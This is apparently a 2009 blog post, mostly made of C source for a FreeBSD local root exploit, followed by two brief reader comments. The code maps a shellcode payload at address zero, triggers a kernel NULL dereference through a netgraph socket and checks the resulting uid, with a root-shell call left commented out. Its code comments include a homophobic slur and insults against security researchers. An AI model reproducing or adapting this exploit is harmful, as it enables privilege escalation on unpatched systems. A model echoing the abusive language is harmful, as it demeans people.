base3 wrote,
@ 2009-01-15 00:33:00
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

/* What kind of faggot has bluetooth enabled on his FreeBSD desktop,  */
/* to which there are also untrusted users logged in? A vulnerability */
/* that could only ever be found by a twat of a 'security researcher' */

char payload[] = { 0x55, 0x64, 0xa1, 0x00, 0x00, 0x00, 0x00, 0x8b,
                   0x00, 0x8b, 0x40, 0x20, 0xc7, 0x40, 0x04, 0x00,
                   0x00, 0x00, 0x00, 0x89, 0xe5, 0x31, 0xc0, 0xc9,
                   0xc3, 0x00 };

int main(int argc, char** argv)
{
  int x;
  int f;
  int u;

  char *args[] = {"/bin/sh", 0};

  f = open("/home/base3/test", O_RDWR);

  mmap(0, 2048, PROT_WRITE | PROT_EXEC, MAP_FIXED, f, 0);
  strncpy((char *)0, payload, 26);

  x = socket(PF_NETGRAPH , SOCK_STREAM, PF_NETGRAPH);
  if (x == -1)
    printf("Fuck.\nAn error, number %d, happened\n", errno);

  shutdown (x, SHUT_RDWR);

  u = (int) geteuid();
  printf ("Your uid is %d\n", u);

  //execve(args[0], args, 0);

  return 0;
}






base3
2009-01-20 12:37 am UTC (link)
they have their purpose, as long as they don't think they are some kind of superhero hacker, just for auditing some code (or even reverse engineering) and finding a buffer overflow



angryskul
2009-01-20 01:51 am UTC (link)
Agreed, I find the whole process rather tedious myself.

go write a filesystem. :)


